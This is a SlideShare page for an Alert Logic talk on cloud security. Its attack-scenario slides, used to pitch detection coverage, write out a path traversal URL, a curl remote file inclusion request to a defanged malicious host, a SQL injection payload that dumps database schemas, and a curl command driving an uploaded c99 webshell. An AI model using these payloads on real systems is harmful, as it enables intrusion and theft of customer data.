SlideShare a Scribd company logo

Realities of Security in the Cloud - CSS ATX 2017

Alert Logic
Alert Logic

Realities of Security in the Cloud - CSS ATX 2017

Technology
1 of 20
Download to read offline
Mark Brooks VP Solution Engineering, Alert Logic REALITIES OF SECURITY IN THE CLOUD
Security is a challenge.
Security Has Changed
Security in the Cloud is a Shared Responsibility PROVIDES • Secure coding and best practices • Software and virtual patching • Configuration management • Access management • Application level attack monitoring • Access management • Patch management • Configuration hardening • Security monitoring • Log analysis • Network threat detection • Security monitoring • Logical network segmentation • Perimeter security services • External DDoS, spoofing, and scanning prevented • Hardened hypervisor • System image library • Root access for customer • Configuration best practices
Let’s talk about security coverage.
Tame the Beast Industry Challenge: The Good, the Bad and the Ugly Known Good Known Bad Suspicious Allow Identify | Tune | Permit Block Drop | Reconfigure Application Stack Web Apps Server-side Apps App Frameworks Dev Platforms Databases Server OS Hypervisor Hardware Classification Action HUMAN EXPERT REQUIRED
Classic 3-Tier Web Application Key Target Assets Key target assets for attack Across the Full Stack 1. Custom application 2. Web server implementation Apache, IIS, NGINGX 3. Application server implementation Tomcat, Jboss, Jetty, ASP 4. Web server frameworks and languages Struts, PHP, Java 5. Databases mySql, Oracle, MSSQL,.. 6. AWS services IAM, EC2, S3 EC2 instances EC2 instances VPC Route 53 Users Internet gateway ELB DB instance DB instance AvailabilityzoneAAvailabilityzoneB Auto scaling group Web App Server Auto scaling group S3 EC2 instances EC2 instances
An attack scenario - Recon VPC Route 53 Internet gateway ELB mySQL instance On linux AvailabilityzoneAAvailabilityzoneB S3 Bastion Host PHP Application On Linux 1 – Performs low-frequency app-scan 2 – Tests path traversal and enumerates directories 3 – Tests remote file inclusion Recon Recon • low slow application level scan • Attacker learns PHP app, on linux, likely mySql DB • Suspects vulnerabilities • tests potential path traversal vulnerability /bWAPP/directory_traversal_2.php?directory=.. /../../../etc • Path traversal is successful. Attacker enumerates server directories. • tests remote file inclusion vulnerability Curl -X POST -F 'url=http [://] malicious [dot] com/test.php' http [://] mysite [dot] com/wp-content/plugins/site- import/admin/page.php> Attacker learnings: vulnerable PHP/mySql app, prone to both smash’n grab attacks as more persistent attack approaches
Entry and data exfiltration • Attacker launches a series of SQL-I injection discovery attempts • Gets a dump-in-one-shot attack and gets full table return http://victim.com/report.php?id=23 and(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>'))))a) Attacker achievements: obtained sensitive customer-data without need for local process or system breaches on servers An attack scenario – opportunistic exfiltration VPC Route 53 Internet gateway ELB mySQL instance On linux AvailabilityzoneAAvailabilityzoneB S3 Bastion Host PHP Application On Linux 4 - SQL-I data extraction attack Recon • low slow application level scan • Attacker learns PHP app, on linux, likely mySql DB • Suspects vulnerabilities • tests potential path traversal vulnerability /bWAPP/directory_traversal_2.php?directory=../../../../etc • Path traversal is successful. Attacker enumerates server directories. • tests remote file inclusion vulnerability Curl -X POST -F 'url=http [://] malicious [dot] com/test.php' http [://] mysite [dot] com/wp-content/plugins/site-import/admin/page.php> Attacker learnings: vulnerable PHP/mySql app, prone to both smasn’n grab attacks as more persistent attack approaches Entry/Exfil
VPC Route 53 Internet gateway ELB mySQL instance On linux AvailabilityzoneAAvailabilityzoneB S3 Bastion Host PHP Application On Linux 5 - Webshell injection 6 - Commanding through Shell Command and control (C&C) • Attacker uploads c99 webshell via RFI vulnerability • Persistent foothold for lateral movement established curl -X POST -F 'act=search' -F 'grep=' -F 'fullhexdump=' -F 'base64=' -F 'nixpasswd=' -F 'pid=' -F 'c=' -F 'white=' -F 'sig=' -F 'processes_sort=' -F 'd=/var/www/' -F 'sort=' -F 'f=' -F 'ft=' http [://] mysite [dot] com/path/to/c99 Attacker achievements: obtained foothold for further action and lateral movement Entry and data exfiltration • Attacker launches a series of SQL-I injection attempts • Gets a dump-in-one-shot attack and gets full table return Attacker achievements: obtained sensitive customer-data without need for local process or system breaches on servers Recon • low slow application level scan • Attacker learns PHP app, on linux, likely mySql DB • Suspects vulnerabilities • tests potential path traversal vulnerability /bWAPP/directory_traversal_2.php?directory=../../../../etc • Path traversal is successful. Attacker enumerates server directories. • tests remote file inclusion vulnerability (RFI) Attacker learnings: vulnerable PHP/mySql app, prone to both smasn’n grab attacks as more persistent attack approaches An attack scenario – persistent foothold Command and control
Deep Application threat visibility Network inspection Expert SOC Analysis of Findings Network, system, application infrastructure threat visibility Alert Logic’s Approach Cloudtrail Config&VulnAssessment Foundation Asset and exposure visibility Log Collection HTTP Inspection Expert Curation, R&D of Content and Intel Analytics and Machine Learning Content and Intel Application level Web Attacks OWASP Top 10 Attacks against vulnerable platforms and libraries Attacks against miscon- figurations
Coverage needed for this scenario Low slow scan Path traver sal RFI SQLi Web shell Recon Entry Exfil C&C Cloudtrail Overall combined coverage scorecard No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage How much can we see?
Coverage needed for this scenario Foundation Asset and exposure visibility Low slow scan Path traver sal RFI SQLi Web shell Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion can not be detected with vuln and config scanning Recon Entry Exfil C&C Cloudtrail Config&VulnAssessment Overall combined coverage No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage
Network, system, application infrastructure threat visibility Coverage needed for this scenario Foundation Asset and exposure visibility Low slow scan Path traver sal RFI SQLi Web shell Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion can not be detected with vuln and config scanning Network inspection providers visibility on attacker actions on the known vulnerabilities exploited in the attack and their success Recon Entry Exfil C&C Network inspection Cloudtrail Config&VulnAssessment Overall combined coverage No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage
Deep Application threat visibility Network, system, application infrastructure threat visibility Coverage needed for this scenario Foundation Asset and exposure visibility Low slow scan Path traver sal RFI SQLi Web shell Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion can not be detected with vuln and config scanning Network inspection providers visibility on attacker actions on the known vulnerabilities exploited in the attack and their success Deep HTTP inspection on requests and responses, learning and anomaly detection deepens coverage for whole classes of application attacks Recon Entry Exfil C&C Network inspection Cloudtrail Config&VulnAssessment Log Collection HTTP Inspection Overall combined coverage No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage
SECURITY EXPERTS Integrated Security Model Incident Investigation System Visual | Context | Hunt Data & Event Sources Assets | Config | Logs Automatic Detection Block | Alert | Log ML Algorithms Rules & Analytics Security Researchers Data Scientists Software Programmers Integrated: Infrastructure | Content | Human Experts Security Analysts
We designed security for cloud and hybrid environments GET STARTED IN MINUTES MAINTAIN COVERAGE AT CLOUD SCALE KEEP PRODUCTION FLOWING with modular services that grow with you Comply with integration to cloud APIs and DevOps automation with auto-scaling support and out-of-band detection Single pane of glass for workload and application security across cloud, hosted & on-premises
Leaders 28 8 6 4 10 25 3 5 5 11 8 10 15 24 Other Amazon Check Point Chronicle Data Cisco Fortinet Intel Security Okta Symantec Barricade JumpCloud Evident.io Palerra Microsoft CloudPassage CloudCheckr FortyCloud ThreatStack Alert Logic A recognized security leader “Alert Logic has a head start in the cloud, and it shows.” PETER STEPHENSON SC Magazine review “…the depth and breadth of the offering’s analytics and threat management process goes beyond anything we’ve seen…”Who is your primary in-use vendor for Cloud Infrastructure Security? Who are the top vendors in consideration for Cloud Infrastructure Security? Alert Logic
Over 4,000 worldwide customers AUTOMOTIVE HEALTHCARE EDUCATION FINANCIAL SERVICES MANUFACTURING MEDIA/PUBLISHING RETAIL/E-COMMERCE ENERGY & CHEMICALS TECHNOLOGY & SERVICES GOV’T / NON-PROFIT
Thank You.

Recommended

Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the Cloud
Alert Logic
 
Stories from the Security Operations Center (S.O.C.)
Stories from the Security Operations Center (S.O.C.)Stories from the Security Operations Center (S.O.C.)
Stories from the Security Operations Center (S.O.C.)
Alert Logic
 
Stories from the Security Operations Center
Stories from the Security Operations CenterStories from the Security Operations Center
Stories from the Security Operations Center
Alert Logic
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the Cloud
Alert Logic
 
Security Implications of the Cloud - CSS Dallas Azure
Security Implications of the Cloud - CSS Dallas AzureSecurity Implications of the Cloud - CSS Dallas Azure
Security Implications of the Cloud - CSS Dallas Azure
Alert Logic
 
CSS 17: NYC - Stories from the SOC
CSS 17: NYC - Stories from the SOCCSS 17: NYC - Stories from the SOC
CSS 17: NYC - Stories from the SOC
Alert Logic
 
Protecting Against Web App Attacks
Protecting Against Web App AttacksProtecting Against Web App Attacks
Protecting Against Web App Attacks
Alert Logic
 
Protecting Against Web Attacks
Protecting Against Web AttacksProtecting Against Web Attacks
Protecting Against Web Attacks
Alert Logic
 

Recommended

Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the Cloud
Alert Logic
 
Stories from the Security Operations Center (S.O.C.)
Stories from the Security Operations Center (S.O.C.)Stories from the Security Operations Center (S.O.C.)
Stories from the Security Operations Center (S.O.C.)
Alert Logic
 
Stories from the Security Operations Center
Stories from the Security Operations CenterStories from the Security Operations Center
Stories from the Security Operations Center
Alert Logic
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the Cloud
Alert Logic
 
Security Implications of the Cloud - CSS Dallas Azure
Security Implications of the Cloud - CSS Dallas AzureSecurity Implications of the Cloud - CSS Dallas Azure
Security Implications of the Cloud - CSS Dallas Azure
Alert Logic
 
CSS 17: NYC - Stories from the SOC
CSS 17: NYC - Stories from the SOCCSS 17: NYC - Stories from the SOC
CSS 17: NYC - Stories from the SOC
Alert Logic
 
Protecting Against Web App Attacks
Protecting Against Web App AttacksProtecting Against Web App Attacks
Protecting Against Web App Attacks
Alert Logic
 
Protecting Against Web Attacks
Protecting Against Web AttacksProtecting Against Web Attacks
Protecting Against Web Attacks
Alert Logic
 
Security Implications of the Cloud
Security Implications of the CloudSecurity Implications of the Cloud
Security Implications of the Cloud
Alert Logic
 
CSS 17: NYC - Realities of Security in the Cloud
CSS 17: NYC - Realities of Security in the CloudCSS 17: NYC - Realities of Security in the Cloud
CSS 17: NYC - Realities of Security in the Cloud
Alert Logic
 
CSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web ApplicationsCSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web Applications
Alert Logic
 
Security Implications of the Cloud - CSS ATX 2017
Security Implications of the Cloud - CSS ATX 2017Security Implications of the Cloud - CSS ATX 2017
Security Implications of the Cloud - CSS ATX 2017
Alert Logic
 
Reality Check: Security in the Cloud
Reality Check: Security in the CloudReality Check: Security in the Cloud
Reality Check: Security in the Cloud
Alert Logic
 
CSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web AppsCSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web Apps
Alert Logic
 
Reducing Your Attack Surface
Reducing Your Attack SurfaceReducing Your Attack Surface
Reducing Your Attack Surface
Alert Logic
 
Css sf azure_8-9-17-stories_from_the_soc_paul fletcher_al
Css sf azure_8-9-17-stories_from_the_soc_paul fletcher_alCss sf azure_8-9-17-stories_from_the_soc_paul fletcher_al
Css sf azure_8-9-17-stories_from_the_soc_paul fletcher_al
Alert Logic
 
CSS17: Houston - Stories from the Security Operations Center
CSS17: Houston - Stories from the Security Operations CenterCSS17: Houston - Stories from the Security Operations Center
CSS17: Houston - Stories from the Security Operations Center
Alert Logic
 
Reducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload ProtectionReducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload Protection
Alert Logic
 
The Intersection of Security & DevOps
The Intersection of Security & DevOpsThe Intersection of Security & DevOps
The Intersection of Security & DevOps
Alert Logic
 
CSS 17: NYC - Building Secure Solutions in AWS
CSS 17: NYC - Building Secure Solutions in AWSCSS 17: NYC - Building Secure Solutions in AWS
CSS 17: NYC - Building Secure Solutions in AWS
Alert Logic
 
Benefits of web application firewalls
Benefits of web application firewallsBenefits of web application firewalls
Benefits of web application firewalls
EnclaveSecurity
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
TriNimbus
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the Cloud
Alert Logic
 
The AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeThe AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in Practice
Alert Logic
 
Managed Threat Detection & Response for AWS Applications
Managed Threat Detection & Response for AWS ApplicationsManaged Threat Detection & Response for AWS Applications
Managed Threat Detection & Response for AWS Applications
Alert Logic
 
#ALSummit: Live Cyber Hack Demonstration
#ALSummit: Live Cyber Hack Demonstration#ALSummit: Live Cyber Hack Demonstration
#ALSummit: Live Cyber Hack Demonstration
Alert Logic
 
The Intersection of Security & DevOps
The Intersection of Security & DevOpsThe Intersection of Security & DevOps
The Intersection of Security & DevOps
Alert Logic
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101
Jannis Kirschner
 
Altitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edgeAltitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edge
Fastly
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptx
karthikvcyber
 

More Related Content

What's hot

Benefits of web application firewalls
Benefits of web application firewallsBenefits of web application firewalls
Benefits of web application firewalls
EnclaveSecurity
 

What's hot (20)

Security Implications of the Cloud
Security Implications of the CloudSecurity Implications of the Cloud
Security Implications of the Cloud
 
CSS 17: NYC - Realities of Security in the Cloud
CSS 17: NYC - Realities of Security in the CloudCSS 17: NYC - Realities of Security in the Cloud
CSS 17: NYC - Realities of Security in the Cloud
 
CSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web ApplicationsCSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web Applications
 
Security Implications of the Cloud - CSS ATX 2017
Security Implications of the Cloud - CSS ATX 2017Security Implications of the Cloud - CSS ATX 2017
Security Implications of the Cloud - CSS ATX 2017
 
Reality Check: Security in the Cloud
Reality Check: Security in the CloudReality Check: Security in the Cloud
Reality Check: Security in the Cloud
 
CSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web AppsCSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web Apps
 
Reducing Your Attack Surface
Reducing Your Attack SurfaceReducing Your Attack Surface
Reducing Your Attack Surface
 
Css sf azure_8-9-17-stories_from_the_soc_paul fletcher_al
Css sf azure_8-9-17-stories_from_the_soc_paul fletcher_alCss sf azure_8-9-17-stories_from_the_soc_paul fletcher_al
Css sf azure_8-9-17-stories_from_the_soc_paul fletcher_al
 
CSS17: Houston - Stories from the Security Operations Center
CSS17: Houston - Stories from the Security Operations CenterCSS17: Houston - Stories from the Security Operations Center
CSS17: Houston - Stories from the Security Operations Center
 
Reducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload ProtectionReducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload Protection
 
The Intersection of Security & DevOps
The Intersection of Security & DevOpsThe Intersection of Security & DevOps
The Intersection of Security & DevOps
 
CSS 17: NYC - Building Secure Solutions in AWS
CSS 17: NYC - Building Secure Solutions in AWSCSS 17: NYC - Building Secure Solutions in AWS
CSS 17: NYC - Building Secure Solutions in AWS
 
Benefits of web application firewalls
Benefits of web application firewallsBenefits of web application firewalls
Benefits of web application firewalls
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the Cloud
 
The AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeThe AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in Practice
 
Managed Threat Detection & Response for AWS Applications
Managed Threat Detection & Response for AWS ApplicationsManaged Threat Detection & Response for AWS Applications
Managed Threat Detection & Response for AWS Applications
 
#ALSummit: Live Cyber Hack Demonstration
#ALSummit: Live Cyber Hack Demonstration#ALSummit: Live Cyber Hack Demonstration
#ALSummit: Live Cyber Hack Demonstration
 
The Intersection of Security & DevOps
The Intersection of Security & DevOpsThe Intersection of Security & DevOps
The Intersection of Security & DevOps
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101
 

Similar to Realities of Security in the Cloud - CSS ATX 2017

Cortana Analytics Workshop: Cortana Analytics -- Security, Privacy & Compliance
Cortana Analytics Workshop: Cortana Analytics -- Security, Privacy & ComplianceCortana Analytics Workshop: Cortana Analytics -- Security, Privacy & Compliance
Cortana Analytics Workshop: Cortana Analytics -- Security, Privacy & Compliance
MSAdvAnalytics
 
CyberCrime in the Cloud and How to defend Yourself
CyberCrime in the Cloud and How to defend Yourself CyberCrime in the Cloud and How to defend Yourself
CyberCrime in the Cloud and How to defend Yourself
Alert Logic
 
Port of seattle security presentation david morris
Port of seattle security presentation david morrisPort of seattle security presentation david morris
Port of seattle security presentation david morris
Emily2014
 

Similar to Realities of Security in the Cloud - CSS ATX 2017 (20)

Altitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edgeAltitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edge
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptx
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
Owasp A9 USING KNOWN VULNERABLE COMPONENTS IT 6873 presentation
Owasp A9 USING KNOWN VULNERABLE COMPONENTS IT 6873 presentationOwasp A9 USING KNOWN VULNERABLE COMPONENTS IT 6873 presentation
Owasp A9 USING KNOWN VULNERABLE COMPONENTS IT 6873 presentation
 
Web application vulnerability assessment
Web application vulnerability assessmentWeb application vulnerability assessment
Web application vulnerability assessment
 
Cortana Analytics Workshop: Cortana Analytics -- Security, Privacy & Compliance
Cortana Analytics Workshop: Cortana Analytics -- Security, Privacy & ComplianceCortana Analytics Workshop: Cortana Analytics -- Security, Privacy & Compliance
Cortana Analytics Workshop: Cortana Analytics -- Security, Privacy & Compliance
 
Presentation for information security & hacking
Presentation for information security & hackingPresentation for information security & hacking
Presentation for information security & hacking
 
Attques web
Attques webAttques web
Attques web
 
CyberCrime in the Cloud and How to defend Yourself
CyberCrime in the Cloud and How to defend Yourself CyberCrime in the Cloud and How to defend Yourself
CyberCrime in the Cloud and How to defend Yourself
 
Css sf azure_8-9-17-protecting_web_apps_stephen coty_al
Css sf azure_8-9-17-protecting_web_apps_stephen coty_alCss sf azure_8-9-17-protecting_web_apps_stephen coty_al
Css sf azure_8-9-17-protecting_web_apps_stephen coty_al
 
Offensive cyber security engineer pragram course agenda
Offensive cyber security engineer pragram course agendaOffensive cyber security engineer pragram course agenda
Offensive cyber security engineer pragram course agenda
 
Offensive cyber security engineer
Offensive cyber security engineerOffensive cyber security engineer
Offensive cyber security engineer
 
Offensive cyber security engineer updated
Offensive cyber security engineer updatedOffensive cyber security engineer updated
Offensive cyber security engineer updated
 
Exploitation techniques and fuzzing
Exploitation techniques and fuzzingExploitation techniques and fuzzing
Exploitation techniques and fuzzing
 
Port of seattle security presentation david morris
Port of seattle security presentation david morrisPort of seattle security presentation david morris
Port of seattle security presentation david morris
 
SOHOpelessly Broken
SOHOpelessly BrokenSOHOpelessly Broken
SOHOpelessly Broken
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?
 
Web Security
Web SecurityWeb Security
Web Security
 
Operational Security Intelligence
Operational Security IntelligenceOperational Security Intelligence
Operational Security Intelligence
 

More from Alert Logic

More from Alert Logic (20)

Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials
 
Managed Threat Detection and Response
Managed Threat Detection and ResponseManaged Threat Detection and Response
Managed Threat Detection and Response
 
Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials
 
Security Implications of the Cloud
Security Implications of the CloudSecurity Implications of the Cloud
Security Implications of the Cloud
 
The AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeThe AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in Practice
 
Security Spotlight: Presidio
Security Spotlight: PresidioSecurity Spotlight: Presidio
Security Spotlight: Presidio
 
Security Spotlight: Rent-A-Center
Security Spotlight: Rent-A-CenterSecurity Spotlight: Rent-A-Center
Security Spotlight: Rent-A-Center
 
The Intersection of Security & DevOps
The Intersection of Security & DevOpsThe Intersection of Security & DevOps
The Intersection of Security & DevOps
 
Security Spotlight: Presidio
Security Spotlight: PresidioSecurity Spotlight: Presidio
Security Spotlight: Presidio
 
Security Implications of the Cloud
Security Implications of the CloudSecurity Implications of the Cloud
Security Implications of the Cloud
 
Reducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload ProtectionReducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload Protection
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the Cloud
 
CSS 2018 Trivia
CSS 2018 TriviaCSS 2018 Trivia
CSS 2018 Trivia
 
The AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeThe AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in Practice
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the Cloud
 
The Intersection of Security and DevOps
The Intersection of Security and DevOpsThe Intersection of Security and DevOps
The Intersection of Security and DevOps
 
Security Spotlight: The Coca Cola Company
Security Spotlight: The Coca Cola CompanySecurity Spotlight: The Coca Cola Company
Security Spotlight: The Coca Cola Company
 
Reducing Your Attack Surface and Yuor Role in Cloud Workload Protection
Reducing Your Attack Surface and Yuor Role in Cloud Workload ProtectionReducing Your Attack Surface and Yuor Role in Cloud Workload Protection
Reducing Your Attack Surface and Yuor Role in Cloud Workload Protection
 
The AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeThe AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in Practice
 
Security Implications of the Cloud
Security Implications of the CloudSecurity Implications of the Cloud
Security Implications of the Cloud
 

Recently uploaded

Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 

Recently uploaded (20)

Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 

Realities of Security in the Cloud - CSS ATX 2017

  • 1. Mark Brooks VP Solution Engineering, Alert Logic REALITIES OF SECURITY IN THE CLOUD
  • 2. Security is a challenge.
  • 4. Security in the Cloud is a Shared Responsibility PROVIDES • Secure coding and best practices • Software and virtual patching • Configuration management • Access management • Application level attack monitoring • Access management • Patch management • Configuration hardening • Security monitoring • Log analysis • Network threat detection • Security monitoring • Logical network segmentation • Perimeter security services • External DDoS, spoofing, and scanning prevented • Hardened hypervisor • System image library • Root access for customer • Configuration best practices
  • 5. Let’s talk about security coverage.
  • 6. Tame the Beast Industry Challenge: The Good, the Bad and the Ugly Known Good Known Bad Suspicious Allow Identify | Tune | Permit Block Drop | Reconfigure Application Stack Web Apps Server-side Apps App Frameworks Dev Platforms Databases Server OS Hypervisor Hardware Classification Action HUMAN EXPERT REQUIRED
